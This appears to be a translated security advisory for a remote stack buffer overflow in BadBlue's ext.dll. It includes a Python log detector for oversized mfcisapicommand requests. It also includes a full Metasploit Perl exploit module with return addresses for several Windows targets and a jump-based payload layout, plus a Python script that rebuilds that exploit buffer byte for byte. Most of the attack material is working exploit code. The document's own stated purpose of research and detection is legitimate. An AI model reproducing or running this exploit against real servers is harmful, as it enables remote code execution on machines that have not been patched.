BadBlue ext.dll mfcisapicommand Remote Buffer Overflow Vulnerability

Published: 2003-04-21
Updated: 2006-04-03

Affected systems:
Working Resources Inc. BadBlue Personal Edition 2.15
Working Resources Inc. BadBlue Personal Edition 1.7.4
Working Resources Inc. BadBlue Personal Edition 1.7.3
Working Resources Inc. BadBlue Personal Edition 1.7.2
Working Resources Inc. BadBlue Personal Edition 1.7
Working Resources Inc. BadBlue Personal Edition 1.6 Beta
Working Resources Inc. BadBlue Personal Edition 1.5.6 Beta
Working Resources Inc. BadBlue Enterprise Edition 2.15
Working Resources Inc. BadBlue Enterprise Edition 1.7.4
Working Resources Inc. BadBlue Enterprise Edition 1.7.3
Working Resources Inc. BadBlue Enterprise Edition 1.7.2
Working Resources Inc. BadBlue Enterprise Edition 1.7.1
Working Resources Inc. BadBlue Enterprise Edition 1.7
Working Resources Inc. BadBlue Enterprise Edition 1.6 Beta
Working Resources Inc. BadBlue Enterprise Edition 1.5.6 Beta
Working Resources Inc. BadBlue Enterprise Edition 1.5
Description:
BUGTRAQ ID: 12673
CVE(CAN) ID: CVE-2005-0595

BadBlue is a combined Web/P2P server that supports CGI and ISAPI. Its bundled ISAPI module provides a dynamic page language embedded in HTML.

BadBlue mishandles certain overlong, malformed requests. A remote attacker can exploit this to execute arbitrary code on the server with the privileges of the web server process.

The overflow is in the ext.dll module: when a request carries an overlong mfcisapicommand query parameter, the value is copied into a fixed-size stack buffer without a length check. An attacker triggers it by submitting a single request with an oversized parameter; no authentication is needed.
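Because the trigger is a single GET whose mfcisapicommand value is far longer than any legitimate command name, the condition is easy to spot in web-server or proxy logs. The following is an added detection example, not part of the original advisory or of BadBlue: it measures the raw length of that parameter in request lines and flags those over a threshold. The 256-byte limit, the sample request lines and the function names are assumptions for illustration; note that the module later on this page sends its request without an HTTP version token, so the parser treats that token as optional.

```python
import re
from urllib.parse import urlsplit

# Threshold is an assumption for illustration: a real ISAPI command name is a
# short token, while the exploit module on this page sends about 500 bytes.
MAX_MFCISAPICOMMAND_LEN = 256

# Request-line pattern.  The HTTP version token is optional because the
# exploit's request ends right after the parameter, with no "HTTP/1.x".
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)(?:\s+HTTP/\d\.\d)?$")

# Constructed sample request lines (not real traffic).
SAMPLE_REQUESTS = [
    "GET /ext.dll?mfcisapicommand=HelloWorld HTTP/1.0",
    "GET /ext.dll?mfcisapicommand=" + "A" * 600 + " HTTP/1.0",
    "GET /index.html HTTP/1.1",
    "GET /ext.dll?other=1&mfcisapicommand=" + "B" * 300,
]


def mfcisapicommand_length(request_line):
    """Return the raw (undecoded) length of the mfcisapicommand value in an
    HTTP request line, or None if the line does not target ext.dll with that
    parameter.  Raw length is an upper bound on what the server sees after
    URL-decoding, so it is a safe basis for a threshold."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/ext.dll"):
        return None
    # Split the query by hand so the value is measured before any decoding.
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if key.lower() == "mfcisapicommand":
            return len(value)
    return None


def flag_oversize(request_lines, limit=MAX_MFCISAPICOMMAND_LEN):
    """Return (index, length) for every line whose parameter exceeds limit."""
    hits = []
    for i, line in enumerate(request_lines):
        n = mfcisapicommand_length(line)
        if n is not None and n > limit:
            hits.append((i, n))
    return hits


if __name__ == "__main__":
    for idx, length in flag_oversize(SAMPLE_REQUESTS):
        print("line %d: mfcisapicommand is %d bytes" % (idx, length))
```

Run over the constructed lines, only the two oversized requests are reported; the 10-byte legitimate command and the unrelated request are ignored.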

<*Source: Matthew Murphy (mattmurphy@kc.rr.com)*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users assume all risk!

Note that the Metasploit module below names BadBlue 2.5 and cites BID 7387 with a disclosure date of Apr 20 2003, while the header of this page lists BID 12673 and CVE-2005-0595 and affected versions up to 2.15. Confirm which advisory and which BadBlue build you are testing against before relying on the module's offsets and return addresses.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::badblue_ext_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };

my $info =
  {
    'Name'  => 'BadBlue 2.5 EXT.dll Buffer Overflow',
    'Version'  => '$Revision: 1.1 $',
    'Authors' => [ 'acaro <acaro [at] jervus.it>', ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32' ],
    'Priv'  => 0,

    'UserOpts'  =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 80],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
      },

    'Payload' =>
      {
        'Space'     => 410,
        'MinNops'   => 10,
        # NUL, LF, CR, and bytes that would break the query string the payload
        # travels in (space, &, +, =, %, <), plus 0x8c.
        'BadChars'  => "\x00\x0a\x0d\x20\x26\x2b\x3d\x25\x8c\x3c",
        'Keys'      => ['+ws2ord'],
      },

    'Description'  => Pex::Text::Freeform(qq{
        This is a stack overflow exploit for BadBlue version 2.5.
        Tested only on the Italian language version of Windows 2000 SP0 and SP4.
        Based on the exploit by Hat-Squad.
}),

    'Refs'  =>
      [
        ['OSVDB', 14238],
        ['BID',    7387],
        ['MIL',      11],
      ],

    'DefaultTarget' => 0,
    'Targets' =>
      [
        ['Bad Blue 2.5 (Universal)', 75, 0x10027728],# jmp ebx in ext.dll
        ['Windows 2000 SP0-SP3 English', 75, 0x6c4292ab],# jmp ebx in mfc42.dll
        ['Windows 2000 SP4 English', 75, 0x6c4302d3],# jmp ebx in mfc42.dll
        ['Windows XP SP0-SP1 English', 75, 0x7762c383],# jmp ebx in shell32.dll
        ['Windows XP SP2 English', 75, 0x73e7dcfd],# jmp ebx in mfc42.dll
        ['Windows 2003 Server SP0-SP1 English', 75, 0x77d7eaf0],# jmp ebx in user32.dll
      ],

    'Keys' => ['badblue'],

    'DisclosureDate' => 'Apr 20 2003',
  };

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];

    if (! $self->InitNops(128)) {
        $self->PrintLine("[*] Failed to initialize the nop module.");
        return;
    }

    # The whole overflow travels in the mfcisapicommand query parameter,
    # which is why BadChars excludes the query-string delimiters.
    my $pattern = "GET /ext.dll?mfcisapicommand=";

    # Buffer layout (offsets from the start of the parameter value):
    #   0    nop sled + encoded payload (Space = 410)
    #   410  alphanumeric padding (target->[1] = 75) up to the saved return address
    #   485  EB 0C 90 90     short jmp +12, over the return address into the nops
    #   489  saved EIP  ->   'jmp ebx' (target->[2]); ebx is expected to point at the stub
    #   493  8 nops
    #   501  E9 0B FE FF FF  jmp rel32 -501, back to offset 5 inside the nop sled
    #   506  8 nops
    $pattern .= $shellcode;
    $pattern .= Pex::Text::AlphaNumText($target->[1]);
    $pattern .= "\xEB\x0C\x90\x90";
    $pattern .= pack('V', $target->[2]);
    $pattern .= $self->MakeNops(8);
    $pattern .= "\xE9\x0B\xFE\xFF\xFF";
    $pattern .= $self->MakeNops(8);

    # No HTTP version token: the request line ends right after the parameter.
    my $request = $pattern . "\x0D\x0A\x0D\x0A";

    $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp ebx at 0x%.8x...", $target->[2]));

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    $s->Send($request);
    $s->Recv(-1, 10);
    $s->Close();
    return;
}

1;
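The module's two hand-written jumps only work if their displacements match the surrounding byte counts exactly, and every fixed byte (the jump stubs and the chosen return address) must avoid the BadChars list. The following added example, which is not part of the original page or of the Metasploit module, rebuilds the same byte layout in Python, decodes the rel8 and rel32 displacements to show where each jump lands, and checks the fixed bytes of every listed target against BadChars. The constants are copied from the module; the `b"A"` padding stands in for `Pex::Text::AlphaNumText(75)`, the NOP-padded `payload` argument stands in for `EncodedPayload->Payload`, and the function names are assumptions.

```python
import struct

# Values copied from the Metasploit module above.
PREFIX = b"GET /ext.dll?mfcisapicommand="
SPACE = 410        # Payload 'Space'
PAD_LEN = 75       # target->[1], alphanumeric padding
BADCHARS = b"\x00\x0a\x0d\x20\x26\x2b\x26\x3d\x25\x8c\x3c"
TARGETS = {        # target name -> 'jmp ebx' address (target->[2])
    "Bad Blue 2.5 (Universal)": 0x10027728,
    "Windows 2000 SP0-SP3 English": 0x6c4292ab,
    "Windows 2000 SP4 English": 0x6c4302d3,
    "Windows XP SP0-SP1 English": 0x7762c383,
    "Windows XP SP2 English": 0x73e7dcfd,
    "Windows 2003 Server SP0-SP1 English": 0x77d7eaf0,
}
SHORT_JMP = b"\xEB\x0C\x90\x90"       # jmp rel8 +12, then two NOPs
LONG_JMP = b"\xE9\x0B\xFE\xFF\xFF"    # jmp rel32
NOP = b"\x90"


def build_request(ret_addr, payload):
    """Reproduce the byte layout of the module's Exploit().

    'payload' stands in for EncodedPayload->Payload (assumption: nop sled
    followed by the encoded payload); it is right-padded with NOPs to SPACE
    bytes here so that every offset matches the Perl code."""
    if len(payload) > SPACE:
        raise ValueError("payload longer than Space=%d" % SPACE)
    body = payload.ljust(SPACE, NOP)
    body += b"A" * PAD_LEN                 # stands in for AlphaNumText(75)
    body += SHORT_JMP
    body += struct.pack("<I", ret_addr)    # pack('V', ...): little-endian dword
    body += NOP * 8
    body += LONG_JMP
    body += NOP * 8
    return PREFIX + body + b"\r\n\r\n"


def analyze_layout(request):
    """Decode the two jumps in a request from build_request() and return
    where they land, as offsets into the parameter value."""
    body = request[len(PREFIX):-4]
    off_short = SPACE + PAD_LEN
    if body[off_short] != 0xEB:
        raise ValueError("no short jmp at offset %d" % off_short)
    rel8 = struct.unpack("<b", body[off_short + 1:off_short + 2])[0]
    off_ret = off_short + len(SHORT_JMP)
    ret_addr = struct.unpack("<I", body[off_ret:off_ret + 4])[0]
    nop_start = off_ret + 4
    off_long = nop_start + 8
    if body[off_long] != 0xE9:
        raise ValueError("no long jmp at offset %d" % off_long)
    rel32 = struct.unpack("<i", body[off_long + 1:off_long + 5])[0]
    return {
        "ret_offset": off_ret,
        "ret_addr": ret_addr,
        # x86 relative jumps are taken from the end of the instruction.
        "short_jmp_target": off_short + 2 + rel8,
        "nop_block": (nop_start, off_long),
        "long_jmp_target": off_long + 5 + rel32,
        "body_len": len(body),
    }


def find_badchars(data, badchars=BADCHARS):
    """Sorted list of bytes from 'badchars' that occur in 'data'."""
    return sorted({b for b in data if b in badchars})


def fixed_bytes_ok(ret_addr):
    """True if the jump stubs and this return address contain no BadChars."""
    return find_badchars(SHORT_JMP + struct.pack("<I", ret_addr) + LONG_JMP) == []


if __name__ == "__main__":
    req = build_request(TARGETS["Bad Blue 2.5 (Universal)"], NOP * 10)
    for k, v in analyze_layout(req).items():
        print("%-18s %s" % (k, hex(v) if k == "ret_addr" else v))
    for name, addr in TARGETS.items():
        print("%-40s %s" % (name, "ok" if fixed_bytes_ok(addr) else "BADCHAR"))
```

The decoded displacements show the design: the short jump at offset 485 lands at 499, inside the eight NOPs that follow the return address, and the rel32 of -501 at offset 501 lands at offset 5 of the parameter value. That landing point is inside the leading NOP sled only if the sled is at least a few bytes long, which is what the module's `MinNops` of 10 buys. The final check confirms that none of the six return addresses, nor the two jump stubs, contains a byte the encoder has been told to avoid; a candidate such as 0x00401000 would fail on its NUL bytes.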

Recommendations:
Vendor patches:

Working Resources Inc.
----------------------
The vendor has released an upgrade that fixes this issue; download it from the vendor's home page:

http://www.badblue.com/index.htm

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; do not reproduce without permission.